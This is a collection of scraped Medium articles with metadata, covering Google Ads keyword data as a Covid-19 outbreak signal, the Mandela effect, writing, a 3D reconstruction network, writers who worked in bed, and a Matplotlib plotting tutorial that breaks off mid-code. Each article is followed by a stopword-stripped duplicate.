Google Searches Reveal Covid-19 Hot Spots Before Governments Do What Google searches reveal that governments won’t A healthcare worker talks to people in line at a United Memorial Medical Center Covid-19 testing site in Houston, Texas, June 25, 2020. Photo: Mark Felix/Getty Images Anosmia — the inability to smell — is an indicator of Covid-19 infection. According to data from 2.5 million users of the COVID Symptom Study app developed at King’s College London, two-thirds of users who tested positive for Covid-19 reported anosmia, compared to just a fifth of those who had tested negative. Meanwhile, tens of thousands of people every day are turning to Google for answers to why they suddenly can’t smell. So is there a correlation between Google searches for “I can’t smell” and positive case rates of Covid-19? Yes. Research shows that anosmia searches almost perfectly matched outbreaks in New York, New Jersey, Louisiana, and Michigan. Outside the U.S., searches peaked with outbreaks in Italy, Spain, Brazil, and the U.K. And a model built by UCL computer scientist Bill Lampos and team shows that Google searches predict Covid-19 case volumes up to 14 days ahead. Among the most predictive are searches for anosmia. So anosmia Google searches can predict outbreaks of Covid-19, but can they prevent them? That depends on how fast you could get the data. If you wanted to use Google searches to get ahead of a Covid-19 outbreak, you would need real-time data. On June 5, for the first time, Houston overtook NYC in anosmia searches. According to the CDC, patients develop symptoms from anywhere between two days to two weeks. This means you only have 14 days to get in front of the outbreak and you need to know who is Googling “I can’t smell” as the searches happen. You’d also want to know the exact number of people who are telling Google they can’t smell. Not an estimate, or an aggregate (such as you get with Google Trends). One way to get this real-time data, while also getting an accurate number of searches, is to buy the keyword “I can’t smell” in Google Ads, Google’s online advertising platform. Within Google Ads, you would write up a basic ad about anosmia (or better yet, use language from an authoritative source that provides information about anosmia). Lastly, you would choose the location you want to pull “I can’t smell” search data from. From there, your ad will serve on the Google results page of every person who is Googling “I can’t smell” in the location you told Google you wanted to target. Whether the searcher clicks your ad or not, their “impression” — an indication that a search for “I can’t smell” was conducted — will be counted in Google Ads. And the data will populate in Google Ads within an hour of someone searching. Here’s a chart of everyone located in the 250 most populated U.S. cities who has Googled “I can’t smell” since April 23 (Y-axis is the number of searches): I have this data because, since April 23, I’ve been buying the keyword “I can’t smell” in Google Ads and targeting searchers located in the top 250 U.S. cities by population. The chart is kind of hard to read. So let’s plot the same data on a map of the U.S.: You can see on the area chart that searches for “I can’t smell” were mostly from New York City and Chicago in late April and early May — two of the cities hardest hit by Covid-19 during that time. You can also see an uptick in searches from Houston and Dallas, Texas, starting in June. On June 5, for the first time, Houston overtook NYC in anosmia searches. (Since June 13, Houston has the highest searches among the top 250 most populated U.S. cities.) Here’s a chart comparing anosmia searches in Houston with positive case rates, during the first three weeks of June: (Anyone who has a few hours to dedicate to YouTube tutorials about Google Ads can do this, too.) I started buying anosmia keywords because I wanted to learn more about people in regions that were (then) in lockdown. But a couple of weeks into the experiment, I realized this method of data mining can also be used to learn more about regions where data is in lockdown. That is, buying keywords and serving ads to a populace can reveal which countries’ governments are lying to their citizens (or the world). Not only about Covid-19, but any topic. The government is hiding the number of deaths, this is 100 percent proven. How many [they’re hiding] is more difficult to say. [They have] completely controlled the data so we haven’t been able to access independent information on what’s really going on. — Zitto Kabwe, leader of the ACT-Wazalendo opposition party Tanzania, in West Africa, has reported just 509 cases of coronavirus since May 8, 2020. Since then, it has not reported a single case. If Google searches about anosmia correlate with, and can predict, Covid-19 infection, and if anosmia is the most common symptom of Covid-19, then we should expect anosmia searches conducted by Tanzanians to be infrequent if there really have been no new infections since May 8. Yet the same week that the Tanzanian government stopped reporting numbers, Tanzania had the second-highest Google search volume globally for anosmia. Soon there were on-the-ground reports of overflowing hospitals and night burials. Critics accused the Tanzanian government of failing to inform the public of the true extent of infections and deaths. To try to get the real story directly from Tanzania’s citizens, starting on the day the Tanzanian government went dark, I bought anosmia keywords, this time targeting ads to the entirety of Tanzania. Here is the corresponding heat map for all regions in Tanzania. On average, 93 English speakers in Tanzania made anosmia Google searches per day between May 8 and May 31, 2020. One quirk of the Google Ads system is you can’t serve ads to people who have their web browsers set to the KiSwahili language. Roughly 12.15 Tanzanians speak KiSwahili for every one person who speaks English. Meanwhile, Google has data on just 5.1% of the country’s devices. So the actual number of anosmia searches being conducted in Tanzania is actually closer to ~1,824 per day. Google is withholding (at least) 94.9% of the data for these campaigns, so I multiply daily searches by 19.61 to get a rough projection of the searches I should be receiving. To put this in perspective, between May 8 and May 31 there were 3,275 anosmia searches from NYC and 18,143 reported cases. The search to case ratio was 1:5.5. In Chicago, there was a search to case ratio of 1:4 during that same time period. In D.C.: 1:1.96. In most of the U.S. cities I targeted, I saw that cases were 1.75–6X anosmia searches. Roughly 1,824 anosmia searches were being conducted from Tanzania every day since May 8. This is not an apples to apples comparison, because I am not counting more ambiguous anosmia-related searches, such as “loss of smell,” in the U.S., and there’s also no way to know for certain how much data Google has on individuals vs. devices in a given region. Nevertheless, I estimate the number of actual Covid-19 cases happening in Tanzania every day in May was in the low four figures. It could be lower. But there can’t be zero cases. “Nowcasting” is the tracking of the spread of illness using Google searches. It’s a technique that works, as Bill Lampos’ model shows. It’s a technique that’s also failed. Google Flu Trends, the first and best-known nowcasting tool, stopped working after three years. It failed to predict the peak of the 2013 flu season. “However, the most helpful conclusion to draw is not that search data analysis is unreliable,” Sam Gilbert writes. “But that it’s a complement to other methods and not a replacement for them.” One model I’m keeping an eye on is run by the MRC Centre for Global Infectious Disease Analysis at Imperial College London. The model estimates the true number of infections in Tanzania during the four weeks between April 29 and May 26, 2020 to be 24,869. Google searches can be a flare to signal observers outside of the black box. Even if it turns out that anosmia-related searches fail to predict Covid-19 infection, I don’t think we should allow the sentiment that took hold after the failure of Google Flu Trends to take hold again. This isn’t the time to be bearish on nowcasting. Because people are turning to Google more than ever to tell it things they tell no one else. And more than ever we need the best option we have available to cut through obfuscation and understand the censored by intercepting their thoughts, fears, hopes (or symptoms). If a government wants to lock down their data — prevent the real story from being learned by their citizens, or the rest of the world — they will have to ban Google outright. Not because their citizens might use Google to research unbiased information, but because Google searches can be a flare to signal observers outside of the black box. “Advertising ceases to be advertising when it answers a question.” This is a motto that colleagues of mine, who resented the fact that they were marketers, but who used Google Ads for commercial applications (to sell people products and services they didn’t need), would tell themselves so they could feel better about their work. When you ask Google a question about reviews on a new sneaker, or about what phase of lockdown you’re currently in, or about a strange symptom you’re suddenly experiencing, the first result on your search results page is an ad, technically. It’s also an answer. It’s also many other things.
https://onezero.medium.com/google-searches-reveal-covid-19-hot-spots-before-governments-do-b689b3008ac1
['Patrick Berlinquette']
2020-07-14 12:22:09.229000+00:00
['Covid 19', 'Coronavirus', 'Google', 'Public Health', 'Data']
Title Google Searches Reveal Covid19 Hot Spots Governments DoContent Google Searches Reveal Covid19 Hot Spots Governments Google search reveal government won’t healthcare worker talk people line United Memorial Medical Center Covid19 testing site Houston Texas June 25 2020 Photo Mark FelixGetty Images Anosmia — inability smell — indicator Covid19 infection According data 25 million user COVID Symptom Study app developed King’s College London twothirds user tested positive Covid19 reported anosmia compared fifth tested negative Meanwhile ten thousand people every day turning Google answer suddenly can’t smell correlation Google search “I can’t smell” positive case rate Covid19 Yes Research show anosmia search almost perfectly matched outbreak New York New Jersey Louisiana Michigan Outside US search peaked outbreak Italy Spain Brazil UK model built UCL computer scientist Bill Lampos team show Google search predict Covid19 case volume 14 day ahead Among predictive search anosmia anosmia Google search predict outbreak Covid19 prevent depends fast could get data wanted use Google search get ahead Covid19 outbreak would need realtime data June 5 first time Houston overtook NYC anosmia search According CDC patient develop symptom anywhere two day two week mean 14 day get front outbreak need know Googling “I can’t smell” search happen You’d also want know exact number people telling Google can’t smell estimate aggregate get Google Trends One way get realtime data also getting accurate number search buy keyword “I can’t smell” Google Ads Google’s online advertising platform Within Google Ads would write basic ad anosmia better yet use language authoritative source provides information anosmia Lastly would choose location want pull “I can’t smell” search data ad serve Google result page every person Googling “I can’t smell” location told Google wanted target Whether searcher click ad “impression” — indication search “I can’t smell” conducted — counted Google Ads data populate Google Ads within hour someone searching Here’s chart everyone located 250 populated US city Googled “I can’t smell” since April 23 Yaxis number search data since April 23 I’ve buying keyword “I can’t smell” Google Ads targeting searcher located top 250 US city population chart kind hard read let’s plot data map US see area chart search “I can’t smell” mostly New York City Chicago late April early May — two city hardest hit Covid19 time also see uptick search Houston Dallas Texas starting June June 5 first time Houston overtook NYC anosmia search Since June 13 Houston highest search among top 250 populated US city Here’s chart comparing anosmia search Houston positive case rate first three week June Anyone hour dedicate YouTube tutorial Google Ads started buying anosmia keywords wanted learn people region lockdown couple week experiment realized method data mining also used learn region data lockdown buying keywords serving ad populace reveal countries’ government lying citizen world Covid19 topic government hiding number death 100 percent proven many they’re hiding difficult say completely controlled data haven’t able access independent information what’s really going — Zitto Kabwe leader ACTWazalendo opposition party Tanzania West Africa reported 509 case coronavirus since May 8 2020 Since reported single case Google search anosmia correlate predict Covid19 infection anosmia common symptom Covid19 expect anosmia search conducted Tanzanians infrequent really new infection since May 8 Yet week Tanzanian government stopped reporting number Tanzania secondhighest Google search volume globally anosmia Soon ontheground report overflowing hospital night burial Critics accused Tanzanian government failing inform public true extent infection death try get real story directly Tanzania’s citizen starting day Tanzanian government went dark bought anosmia keywords time targeting ad entirety Tanzania corresponding heat map region Tanzania average 93 English speaker Tanzania made anosmia Google search per day May 8 May 31 2020 One quirk Google Ads system can’t serve ad people web browser set KiSwahili language Roughly 1215 Tanzanians speak KiSwahili every one person speaks English Meanwhile Google data 51 country’s device actual number anosmia search conducted Tanzania actually closer 1824 per day Google withholding least 949 data campaign multiply daily search 1961 get rough projection search receiving put perspective May 8 May 31 3275 anosmia search NYC 18143 reported case search case ratio 155 Chicago search case ratio 14 time period DC 1196 US city targeted saw case 175–6X anosmia search Roughly 1824 anosmia search conducted Tanzania every day since May 8 apple apple comparison counting ambiguous anosmiarelated search “loss smell” US there’s also way know certain much data Google individual v device given region Nevertheless estimate number actual Covid19 case happening Tanzania every day May low four figure could lower can’t zero case “Nowcasting” tracking spread illness using Google search It’s technique work Bill Lampos’ model show It’s technique that’s also failed Google Flu Trends first bestknown nowcasting tool stopped working three year failed predict peak 2013 flu season “However helpful conclusion draw search data analysis unreliable” Sam Gilbert writes “But it’s complement method replacement them” One model I’m keeping eye run MRC Centre Global Infectious Disease Analysis Imperial College London model estimate true number infection Tanzania four week April 29 May 26 2020 24869 Google search flare signal observer outside black box Even turn anosmiarelated search fail predict Covid19 infection don’t think allow sentiment took hold failure Google Flu Trends take hold isn’t time bearish nowcasting people turning Google ever tell thing tell one else ever need best option available cut obfuscation understand censored intercepting thought fear hope symptom government want lock data — prevent real story learned citizen rest world — ban Google outright citizen might use Google research unbiased information Google search flare signal observer outside black box “Advertising cease advertising answer question” motto colleague mine resented fact marketer used Google Ads commercial application sell people product service didn’t need would tell could feel better work ask Google question review new sneaker phase lockdown you’re currently strange symptom you’re suddenly experiencing first result search result page ad technically It’s also answer It’s also many thingsTags Covid 19 Coronavirus Google Public Health Data
3,846
Which Image Is Right?. Are we in an alternate reality or does…
Possible Explanations for Mandela Effects Alternate Realities One theory about the basis for the Mandela effect originates from quantum physics and relates to the idea that rather than one timeline of events, it is possible that alternate realities or universes are taking place and mixing with our timeline. In theory, this would result in groups of people having the same memories because the timeline has been altered as we shift between these different realities. False Memories Before we consider what is meant by false memories, let’s look at an example of the Mandela effect as it will help us to understand how memory can be faulty (and may lead to the phenomenon that we are describing). Who was Alexander Hamilton? Most Americans learned in school that he was a founding father of the United States of America but that he was not a president. However, when asked about the presidents of the United States, many people mistakenly believe that Hamilton was a president. Why? If we consider a simple neuroscience explanation, the memory for Alexander Hamilton is encoded in an area of the brain where the memories for the presidents of the United States are stored. The means by which memory traces are stored is called the engram and the framework in which similar memories are associated with each other is called the schema. So when people try to recall Hamilton, this sets off the neurons in close connection to each other, bringing with it the memory of the presidents. (Though this is an oversimplified explanation, it illustrates the general process.) When memories are recalled, rather than remembered perfectly, they are influenced to the point that they can eventually become incorrect. In this way, memory is unreliable and not infallible. Memory-Related Concepts This leads to the likelihood that problems with memory, and not alternate universes, are the explanation for the Mandela effect. In fact, there are a number of subtopics related to memory that may play a role in this phenomenon. Here are a few possibilities to consider:
https://medium.com/random-awesome/which-image-is-right-d67e758ca471
['Toni Tails']
2020-12-11 15:37:17.437000+00:00
['Humor', 'History', 'Marketing', 'Psychology', 'Art']
Title Image Right alternate reality does…Content Possible Explanations Mandela Effects Alternate Realities One theory basis Mandela effect originates quantum physic relates idea rather one timeline event possible alternate reality universe taking place mixing timeline theory would result group people memory timeline altered shift different reality False Memories consider meant false memory let’s look example Mandela effect help u understand memory faulty may lead phenomenon describing Alexander Hamilton Americans learned school founding father United States America president However asked president United States many people mistakenly believe Hamilton president consider simple neuroscience explanation memory Alexander Hamilton encoded area brain memory president United States stored mean memory trace stored called engram framework similar memory associated called schema people try recall Hamilton set neuron close connection bringing memory president Though oversimplified explanation illustrates general process memory recalled rather remembered perfectly influenced point eventually become incorrect way memory unreliable infallible MemoryRelated Concepts lead likelihood problem memory alternate universe explanation Mandela effect fact number subtopics related memory may play role phenomenon possibility considerTags Humor History Marketing Psychology Art
3,847
The Best Software Engineering Books I Read in 2020
The Best Software Engineering Books I Read in 2020 A software engineer’s reading list Photo by Thought Catalog on Unsplash. As 2020 draws to a close, I am thrilled to share with you a selection of the best software engineering books that I have read during the past 12 months. If you are a software engineer, data scientist, or one of those people who work in the tech or software industry, you will agree with me that you have to constantly keep learning if you are to remain relevant in the game. When you decide to become a software engineer, you essentially sign up for a journey of lifelong learning. There are many ways of learning or acquiring knowledge, but books still remain a dominant force in that sphere.
https://medium.com/better-programming/the-best-software-engineering-books-i-read-in-2020-8bf9dee61111
['Mwiza Kumwenda']
2020-12-28 16:36:35.924000+00:00
['Programming', 'Software Development', 'JavaScript', 'Books', 'Software Engineering']
Title Best Software Engineering Books Read 2020Content Best Software Engineering Books Read 2020 software engineer’s reading list Photo Thought Catalog Unsplash 2020 draw close thrilled share selection best software engineering book read past 12 month software engineer data scientist one people work tech software industry agree constantly keep learning remain relevant game decide become software engineer essentially sign journey lifelong learning many way learning acquiring knowledge book still remain dominant force sphereTags Programming Software Development JavaScript Books Software Engineering
3,848
Feeling Good About Writing is a Good Enough Reason to Keep Going
Writing isn’t like eating croissants. It isn’t like pancakes or waffles or whatever your decadent pleasure. There’s no need to feel guilty about enjoying writing for the sake of writing. You don’t need to make a lot of money from your writing to be worthy of writing. Earlier this year, my family and I visited Paris, and I ate more croissants than I could count. It made me want to run a 5K every day. This is a natural reaction — extreme or not — to an overindulgence issue. But when I overindulge in writing (if that even exists), there’s no such feeling unless outside circumstances have pushed me to feel this way. Meaning, I’ve allowed either someone or something to tell me that writing for enjoyment isn’t enough. That I should push for more based on not my own values, but someone else’s. In marketing, there’s a term called KPI, which means key performance indicators. As a good marketer, you define your KPIs and measure them based on your goals for implementing your marketing strategy. As a writer, you define your personal KPIs based on your goals. Many writers who enjoy writing end up quitting altogether because they haven’t properly defined their goals. Or they’ve become attached to goals that don’t align with what they truly value.
https://medium.com/2-minute-madness/feeling-good-about-writing-is-a-good-enough-reason-to-keep-going-c67448fd82b
['Brandon B. Keith']
2020-11-13 18:43:51.740000+00:00
['Writing Tips', 'Writing', 'Self', 'Art', 'Creativity']
Title Feeling Good Writing Good Enough Reason Keep GoingContent Writing isn’t like eating croissant isn’t like pancake waffle whatever decadent pleasure There’s need feel guilty enjoying writing sake writing don’t need make lot money writing worthy writing Earlier year family visited Paris ate croissant could count made want run 5K every day natural reaction — extreme — overindulgence issue overindulge writing even exists there’s feeling unless outside circumstance pushed feel way Meaning I’ve allowed either someone something tell writing enjoyment isn’t enough push based value someone else’s marketing there’s term called KPI mean key performance indicator good marketer define KPIs measure based goal implementing marketing strategy writer define personal KPIs based goal Many writer enjoy writing end quitting altogether haven’t properly defined goal they’ve become attached goal don’t align truly valueTags Writing Tips Writing Self Art Creativity
3,849
The Best of Better Programming (10/31–11/13/2020)
Jobs from Better Programming Jobs Our job board is launching very soon for your company to hire through us but this week we have two exciting opportunities from the Better Programming Staff! Better Programming's Co-Founder and Publisher is looking for a Ruby or Rails Engineer: * First, Tony Stubblebine is looking for a "I'm looking for a programmer to work on a side project with me to help put self-published books on to Medium. Will pay normal $ + split profit on the tool." More details about the project can be found here: https://coachtony.medium.com/epub-to-medium-daf8ae8431f1 --- * Second, Better Programming is looking for a substitute Editor-in-Chief for Late January-March: My wife and I are expecting our first child at the end of January, so I'm looking for someone with a technical background and some editorial experience to fill in for me while I take paternity leave. If interested, email me @ [email protected] with your engineering and editorial qualifications. This is a paid opportunity. --- Jobs are free to post and $100 to promote to our email list of 75,000+ job seekers. Want to post your company's job with Better Programming Jobs? Just fill out our Typeform here. and $100 to promote to our email list of 75,000+ job seekers.
https://medium.com/better-programming/the-best-of-better-programing-10-31-11-13-2020-51b70d16dac
['Zack Shapiro']
2020-11-13 18:36:55.323000+00:00
['Startup', 'JavaScript', 'Software Development', 'Python', 'Programming']
Title Best Better Programming 1031–11132020Content Jobs Better Programming Jobs job board launching soon company hire u week two exciting opportunity Better Programming Staff Better Programmings CoFounder Publisher looking Ruby Rails Engineer First Tony Stubblebine looking Im looking programmer work side project help put selfpublished book Medium pay normal split profit tool detail project found httpscoachtonymediumcomepubtomediumdaf8ae8431f1 Second Better Programming looking substitute EditorinChief Late JanuaryMarch wife expecting first child end January Im looking someone technical background editorial experience fill take paternity leave interested email zacksubeditorzackshapirocom engineering editorial qualification paid opportunity Jobs free post 100 promote email list 75000 job seeker Want post company job Better Programming Jobs fill Typeform 100 promote email list 75000 job seekersTags Startup JavaScript Software Development Python Programming
3,850
Atlas — Neural Network Reconstructing a 3D Scene From Image 📸
Limitations of past models Traditional approaches to the 3D reconstruction task rely on the intermediate representation of depth maps before predicting the full 3D model of the scene. The researchers hypothesized that direct 2D to 3D prediction without an intermediate step would yield more accurate results. How the proposed approach works The input of the model is 2D images of the scene. 2D CNN extracts features from each input image separately. These features are projected and accumulated in voxels. After 3D accumulation, CNN refines the accumulated features and predicts the truncated signed distance function (TSDF) values. In addition, semantic segmentation of the reconstructed 3D model is carried out without significant additional calculations.
https://medium.com/deep-learning-digest/atlas-neural-network-reconstructing-a-3d-scene-from-image-d8422c135d81
['Mikhail Raevskiy']
2020-09-01 13:21:13.189000+00:00
['Deep Learning', 'Machine Learning', 'Data Science', 'Artificial Intelligence', 'AI']
Title Atlas — Neural Network Reconstructing 3D Scene Image 📸Content Limitations past model Traditional approach 3D reconstruction task rely intermediate representation depth map predicting full 3D model scene researcher hypothesized direct 2D 3D prediction without intermediate step would yield accurate result proposed approach work input model 2D image scene 2D CNN extract feature input image separately feature projected accumulated voxels 3D accumulation CNN refines accumulated feature predicts truncated signed distance function TSDF value addition semantic segmentation reconstructed 3D model carried without significant additional calculationsTags Deep Learning Machine Learning Data Science Artificial Intelligence AI
3,851
There are Only Two Jobs You Can Do From Your Bed
Here are some writers and authors who did great work and even preferred writing in bed: 1. Marcel Proust Shanghai Noir Marcel Proust writing in bed “It is pleasant, when one is distraught, to lie in the warmth of one’s bed, and there, with all effort and struggle at an end, even perhaps with one’s head under the blankets, surrender completely to howling, like branches in the autumn wind.” 2. Truman Capote “I am a completely horizontal author,” said the author of In Cold Blood and Breakfast at Tiffany’s, “I can’t think unless I’m lying down, either in bed or stretched on a couch and with a cigarette and coffee handy.” Truman Capote writing in bed Copyright getty image 3. William Wordsworth The Romantic poet apparently preferred writing his poems in bed in complete darkness, starting over whenever he lost a sheet of paper because looking for it was too much effort. 4. Mark Twain “Just try it in bed some time,” the author told the New York Times in 1902. “I sit up with a pipe in my mouth and a board on my knees, and I scribble away. Thinking is easy work, and there isn’t much labor in moving your fingers sufficiently to get the words down.” 5. James Joyce The Irish author wrote lying down on his stomach — which doesn’t seem like the most comfortable position. 6. George Orwell The dying George Orwell used to prop his typewriter up in bed and hammer away at the final draft of 1984. The doctor who treated him in Glasgow said all he could remember was the sound of typing and the fog of cigarette smoke in Orwell’s bedroom.
https://medium.com/writing-heals/there-are-only-two-jobs-you-can-do-from-your-bed-9f1a5fd9bf38
['Michelle Monet']
2019-11-09 17:11:29.314000+00:00
['Writing Life', 'History', 'Writing', 'Creativity', 'Art']
Title Two Jobs BedContent writer author great work even preferred writing bed 1 Marcel Proust Shanghai Noir Marcel Proust writing bed “It pleasant one distraught lie warmth one’s bed effort struggle end even perhaps one’s head blanket surrender completely howling like branch autumn wind” 2 Truman Capote “I completely horizontal author” said author Cold Blood Breakfast Tiffany’s “I can’t think unless I’m lying either bed stretched couch cigarette coffee handy” Truman Capote writing bed Copyright getty image 3 William Wordsworth Romantic poet apparently preferred writing poem bed complete darkness starting whenever lost sheet paper looking much effort 4 Mark Twain “Just try bed time” author told New York Times 1902 “I sit pipe mouth board knee scribble away Thinking easy work isn’t much labor moving finger sufficiently get word down” 5 James Joyce Irish author wrote lying stomach — doesn’t seem like comfortable position 6 George Orwell dying George Orwell used prop typewriter bed hammer away final draft 1984 doctor treated Glasgow said could remember sound typing fog cigarette smoke Orwell’s bedroomTags Writing Life History Writing Creativity Art
3,852
People first: Aurélien Nicolas (Deckard AI)
“AI for Software Engineering Process Management” is another one filed of using Artificial Intelligence for Software Engineering. This time we prepared the interview with Aurélien Nicolas, CTO at Deckard AI, an expert in this Subject Matter, to share a bit about his technical background, personal motivation and profession vision.
https://medium.com/ai-for-software-engineering/people-first-aur%C3%A9lien-nicolas-deckard-ai-3a1768ff9d93
['Aiforse Community']
2017-10-27 07:07:35.514000+00:00
['Machine Learning', 'Project Management', 'Software Development', 'Artificial Intelligence', 'People']
Title People first Aurélien Nicolas Deckard AIContent “AI Software Engineering Process Management” another one filed using Artificial Intelligence Software Engineering time prepared interview Aurélien Nicolas CTO Deckard AI expert Subject Matter share bit technical background personal motivation profession visionTags Machine Learning Project Management Software Development Artificial Intelligence People
3,853
Starting off with Visualization in Python — Matplotlib
First step as always is to import all the required libraries. import matplotlib.pyplot as plt import numpy as np from random import sample %matplotlib inline Lets generate some data for the plotting exercise and plot a simple line plot. x = np.linspace(0,10,20)#Generate 20 points between 0 and 10 y = x**2 # Create y as X squared plt.plot(x,y) # Plot the above data Figure 1 Plotting the above figure requires only a single line command. While it is simple, it does not mean we don’t have the option to customize it. plt.plot(x, y, color='green', linestyle='--', linewidth=2, alpha= 0.5) Figure 2 The parameters passed within the plot command control for: ‘color’ indicates the colour of the line and can be given even as a RGB hex code ‘linestyle’ is how you want the line to be, can be ‘ — — ’ or ‘-.’ for dash dotted line ‘linewidth’ takes an integer input for indicating the thickness of the line ‘alpha’ controls the transparency of the line Sometimes a line might not be enough, you might need to even indicate which are the exact data points, in such cases you can add markers plt.plot(x, y, marker = 'o', markerfacecolor = 'red', markersize = 5) Fig 3 This plot has red coloured round markers. These markers can further be customized by modifying their boundaries. plt.plot(x, y, marker = 'o', markerfacecolor = 'red', markersize = 10, markeredgewidth = 2, markeredgecolor = 'black') Fig 4 The markers are same as before, but now they have a black boundary. The parameters for controlling the markers are: ‘marker’ indicates what shape you want the marker to be, can be ‘o’ ,‘*’ or ‘+’ ‘markerfacecolor’ indicates the colour of the marker ‘markersize’ similar to linewidth controls the size of the marker ‘markeredgewidth’ and ‘markeredgecolor’ are used for specifying the boundary thickness and colour respectively. Lets combine all of the above together into one plot: Figure 5 Not the prettiest of plots, but you get the idea. While this covers the basics of plotting data, there is still a lot more to be done is terms of titles, range of axes, legends etc. The easiest way to do this is via the use of Matplotlib’s object oriented method. Object Oriented method Matplotlib has an object oriented API which allows you to create figure and axes objects. These objects can then be called in an orderly manner to perform functions such as plotting the data or customizing the figure. fig, ax = plt.subplots() Fig 6 The above command returns the figure and axis objects and creates an empty plot. This can then be used to recreate the above plot with the plot and axes titles and the legend. fig, ax = plt.subplots()#Create the objects ax.plot(x,y,label = 'X squared')#The data to be plotted and legend ax.set_title('Plot 1')#Plot title ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.set_xlim(0,10)#Range of X axis ax.set_ylim(0,110)#Range of Y axis plt.legend()#Command to display the legend Fig 7 The above plot(Fig 7) has the axes and plot titles, legend and different ranges for the X and Y axes. Plotting Multiple lines Suppose you want to compare two different sets of data, i.e, by plotting multiple lines in the same figure. In that case all you need to add is one more plot command. fig, ax = plt.subplots()#Create the objects ax.plot(x,y,label = 'X squared')#The data to be plotted and legend ax.plot(x,x**3,label = 'X cubed')#The data to be plotted and legend ax.set_title('Plot 1')#Plot title ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.set_xlim(0,10)#Range of X axis ax.set_ylim(0,110)#Range of Y axis plt.legend()#Command to display the legend Fig 8 Another way of comparing would be to show two different plots side by side. fig, ax = plt.subplots(1,2)#Create the objects ax[0].plot(x,y,label = 'X squared')#The data to be plotted and legend ax[1].plot(x,x**3,label = 'X cubed')#The data to be plotted and legend ax[0].set_title('Plot 1')#Plot title ax[1].set_title('Plot 2')#Plot title ax[0].legend()#Command to display the legend for plot 1 ax[1].legend()#Command to display the legend for plot 2 plt.tight_layout()#To ensure no overlap Fig 9 This is done by first passing in the number of plots in the ‘subplot()’ function. The (1,2) above means that there should be 1 row of plots and 2 columns of plots, in effective meaning 2 plots. The functions are repeated for each one of the plots and the ‘tight_layout()’ command ensures that there is no overlap. A small change here being the command to display the legends. The plot.legend() function displays the legend only for one plot, to display for both you need to specify it for each plot. The third way of comparison would be to use an inset plot. Within a larger plot, have a smaller plot. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared')# Main plot axins.plot(x,1/x,label='X inverse')# Inset plot ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title ax.set_title('Main Plot')#Main plot title axins.set_title('Inset Plot')# Inset plot title ax.legend()#Legend for main plot axins.legend()#Legend for inset plot Fig 10 The ‘figsize’ parameter within the ‘subplots()’ function allows to change the size of the figure. The ‘inset_axes’ function is used to create the inset plot while also specifying the location and size. The first two numbers specify the plot location in terms of percentage. In the above case, the first two numbers 0.1 and 0.6 specifies that the plot should be 10% to the left and 60% above the Y and X axes respectively. The last two numbers 0.4 and 0.3 specifies that the plot should be 40% and 30% of the main plot’s width and height. You might have noticed that the legend of the main plot is overlapping on the inset plot. While matplotlib automatically chooses the best possible location for the legend, it can be manually moved as well using the ‘loc’ parameter. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared') axins.plot(x,1/x,label='X inverse') ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title ax.set_title('Main Plot') axins.set_title('Inset Plot') ax.legend(loc = 4) axins.legend() Fig 11 The ‘loc’ parameter takes in input between 0 and 10 corresponding to a position within the plot. 0 means that Matplotlib will choose the best possible position and it is the default option with all other integers corresponding to a location within the plot. Here I passed ‘4’ to the ‘loc’ parameter meaning the legend is placed in the bottom right corner. The last customization I will be covering will be with changing the plot background. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared') axins.plot(x,1/x,label='X inverse') ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.grid(True)#Show grid axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title axins.grid(color='blue', alpha=0.3, linestyle='--', linewidth=2)#Grid modifications ax.set_title('Main Plot') axins.set_title('Inset Plot') ax.legend(loc = 4) axins.legend() Fig 12 The main plot here has the default grid, which can be created by simply calling the grid() function. The grid lines too can be modified just like the plot lines. These modifications can be seen in the inset plot. The grid lines in it have a different colour, style and width compared to the ones in the main plot.
https://towardsdatascience.com/visualization-in-python-matplotlib-c5c2aa2620a
['Pranav Prathvikumar']
2019-10-24 20:03:31.178000+00:00
['Python', 'Data Science', 'Visualization', 'Data Visualization']
Title Starting Visualization Python — MatplotlibContent First step always import required library import matplotlibpyplot plt import numpy np random import sample matplotlib inline Lets generate data plotting exercise plot simple line plot x nplinspace01020Generate 20 point 0 10 x2 Create X squared pltplotxy Plot data Figure 1 Plotting figure requires single line command simple mean don’t option customize pltplotx colorgreen linestyle linewidth2 alpha 05 Figure 2 parameter passed within plot command control ‘color’ indicates colour line given even RGB hex code ‘linestyle’ want line ‘ — — ’ ‘’ dash dotted line ‘linewidth’ take integer input indicating thickness line ‘alpha’ control transparency line Sometimes line might enough might need even indicate exact data point case add marker pltplotx marker markerfacecolor red markersize 5 Fig 3 plot red coloured round marker marker customized modifying boundary pltplotx marker markerfacecolor red markersize 10 markeredgewidth 2 markeredgecolor black Fig 4 marker black boundary parameter controlling marker ‘marker’ indicates shape want marker ‘o’ ‘’ ‘’ ‘markerfacecolor’ indicates colour marker ‘markersize’ similar linewidth control size marker ‘markeredgewidth’ ‘markeredgecolor’ used specifying boundary thickness colour respectively Lets combine together one plot Figure 5 prettiest plot get idea cover basic plotting data still lot done term title range ax legend etc easiest way via use Matplotlib’s object oriented method Object Oriented method Matplotlib object oriented API allows create figure ax object object called orderly manner perform function plotting data customizing figure fig ax pltsubplots Fig 6 command return figure axis object creates empty plot used recreate plot plot ax title legend fig ax pltsubplotsCreate object axplotxylabel X squaredThe data plotted legend axsettitlePlot 1Plot title axsetxlabelXX axis title axsetylabelYY axis title axsetxlim010Range X axis axsetylim0110Range axis pltlegendCommand display legend Fig 7 plotFig 7 ax plot title legend different range X ax Plotting Multiple line Suppose want compare two different set data ie plotting multiple line figure case need add one plot command fig ax pltsubplotsCreate object axplotxylabel X squaredThe data plotted legend axplotxx3label X cubedThe data plotted legend axsettitlePlot 1Plot title axsetxlabelXX axis title axsetylabelYY axis title 